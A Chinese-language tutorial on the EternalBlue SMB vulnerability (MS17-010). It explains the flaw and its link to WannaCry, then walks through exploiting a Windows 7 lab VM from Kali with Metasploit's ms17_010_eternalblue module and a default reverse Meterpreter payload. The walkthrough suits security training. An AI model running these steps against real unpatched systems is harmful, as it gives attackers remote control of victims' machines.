一、什么是永恒之蓝
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
二、什么是SMB协议
SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
三、漏洞描述
永恒之蓝 主要就是通过TCP端口(445)和139 来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的windows 机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器里进行一系列的危险操作。如远程控制木马,获取最高权限等。
四、影响范围
windows xp 2003 2008 7 8 等受影响
五、漏洞利用
1.准备一台kali虚拟机,一台windows 7虚拟机
2.分别查看kali和windows 7的IP地址
kali ip:192.168.110.140
windows 7 ip:192.168.110.145
3.检查kali和windows 7的连通性:用kali去ping windows 7
这里是相通的
4.启动kali上msf的数据库
systemctl start postgresql
这里看看是否开启成功
已开启。
5、打开msf进行漏洞利用
用db_status查看是否连接上数据库
显示已连接
查找我们的漏洞利用模块
search ms17_010
使用漏洞利用模块
use exploit/windows/smb/ms17_010_eternalblue
使用show options查看一下要配置的命令参数
配置相应的参数
set rhost 192.168.110.145
因为默认设置的是meterpreter的反向连接并且设置好了选项,这里我们就不设置payload了,就用默认的。
这样我们所有必须要设置的参数就设置好了,我们可以run运行我们的漏洞模块
利用成功
因为利用的是meterpreter的payload所以我们还可以进行一些后渗透操作!
